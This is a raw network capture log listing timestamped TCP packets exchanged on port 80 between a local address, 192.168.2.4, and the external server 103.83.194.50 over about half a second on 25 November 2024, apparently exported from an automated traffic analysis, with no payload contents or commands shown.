                                                                Nov 25, 2024 07:09:05.766690016 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.766886950 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.771579027 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.771636963 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.771687984 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.776135921 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.776191950 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.776283979 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.776339054 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.780935049 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.781044960 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.781090975 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.785732031 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.785908937 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.785975933 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.790529013 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.790644884 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.790674925 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.790687084 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.795283079 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.795341015 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.795424938 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.795618057 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.800165892 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.800216913 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.800239086 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.800296068 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.804848909 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.804897070 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.804953098 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.805017948 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.809634924 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.809686899 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.809772015 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.809819937 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.814425945 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.814479113 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.814552069 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.814757109 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.819224119 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.819283962 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.819328070 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.819375038 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.823983908 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.824127913 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.824198008 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.828741074 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.828795910 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.828852892 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.831075907 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.833540916 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.833594084 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.833646059 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.833693981 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.838402033 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.838495016 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.838660955 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.843147993 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.843214035 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.843272924 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.847896099 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.848001003 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.848067045 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.852762938 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.852792025 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.852813005 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.852843046 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.857455015 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.857506037 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.857513905 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.857557058 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.960282087 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.960340977 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.960402966 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.960450888 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.962131977 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.962181091 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.962201118 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.962245941 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.965770960 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.965858936 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.965890884 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.965934038 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.969408989 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.969454050 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.969533920 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.969579935 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.973050117 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.973105907 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.973201036 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.973267078 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.976597071 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.976646900 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.976737022 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.976783991 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.980114937 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.980165005 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.980232954 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.980279922 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.983459949 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.983508110 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.983601093 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.983645916 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.986825943 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.986872911 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.986973047 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.987016916 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.990297079 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.990346909 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.990525961 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.990573883 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.993856907 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.993910074 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.993921995 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.993968010 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.996768951 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.996819019 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.996900082 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.996948004 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.000081062 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.000171900 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.000191927 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.000235081 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.003393888 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.003443956 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.003485918 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.003531933 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.006699085 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.006746054 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.006849051 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.006896973 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.010036945 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.010080099 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.010126114 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.010171890 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.013349056 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.013398886 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.013439894 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.013488054 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.016664982 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.016716957 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.016757965 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.016803980 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.020020008 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.020067930 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.020133018 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.020180941 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.023288965 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.023338079 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.023411036 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.023456097 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.026612997 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.026670933 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.026751995 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.026798964 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.029925108 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.029969931 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.030013084 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.030071974 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.033226013 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.033265114 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.033272028 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.033304930 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.036555052 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.036603928 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.036621094 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.036665916 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.040893078 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.041130066 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.041178942 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.043328047 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.043382883 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.043436050 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.046475887 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.046596050 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.046643019 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.049788952 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.049909115 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.049967051 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.053114891 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.053263903 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.053329945 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.056638002 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.056696892 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.056699991 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.056737900 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.059748888 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.059812069 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.059847116 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.060148001 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.063054085 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.063160896 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.063211918 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.066584110 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.066695929 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.066855907 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.069739103 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.069849014 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.069901943 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.072995901 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.073075056 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.073129892 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.076316118 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.076452017 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.076513052 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.081716061 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.081731081 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.081794977 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.083107948 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.083122969 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.083158970 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.083237886 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.171613932 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.171703100 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.171717882 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.171770096 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.172494888 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.172529936 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.172580004 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.174526930 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.174627066 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.174676895 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.176898003 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.177005053 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.177054882 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.179383039 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.179399967 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.179447889 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.181649923 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.181763887 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.181813955 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.183967113 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.184026957 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.184067965 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.184789896 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.186320066 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.186371088 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.186427116 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.186476946 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.188601017 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.188755035 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.188796997 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.188808918 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.191015005 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.191040993 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.191099882 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.193097115 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.193213940 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.193265915 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.195342064 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.195480108 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.195525885 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.197566986 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.197674036 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.197721004 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.199646950 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.199701071 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.199743032 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.200795889 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.201828957 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.201874018 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.201925039 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.203926086 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.203978062 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.204020023 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.204071999 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.206089973 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.206166029 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.206208944 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.208204985 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.208283901 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.208327055 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.210305929 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.210357904 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.210427046 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.210591078 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.212346077 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.212481976 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.212558985 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.214413881 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.214520931 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.214567900 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.216479063 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.216548920 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.216583967 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.216630936 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.218592882 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.218657017 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.218683958 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.218729019 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.220657110 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.220772028 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.220793009 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.220818043 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.222721100 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.222898960 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.222934008 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.222958088 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.224792957 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.224843979 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.224921942 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.225114107 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.226861954 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.227051973 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.227113962 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.229091883 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.229149103 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.229171038 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.229343891 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.231044054 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.231092930 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.231134892 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.231184959 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.233131886 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.233272076 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.233334064 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.235198975 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.235256910 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.235325098 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.235380888 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.237303972 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.237377882 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.237401009 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.237435102 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.239537954 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.239586115 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.239667892 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.239708900 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.241540909 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.241609097 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.241667986 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.243493080 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.243630886 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.243660927 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.243700981 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.245575905 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.245629072 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.245701075 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.245749950 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.247648954 CET8049743103.83.194.50192.168.2.4
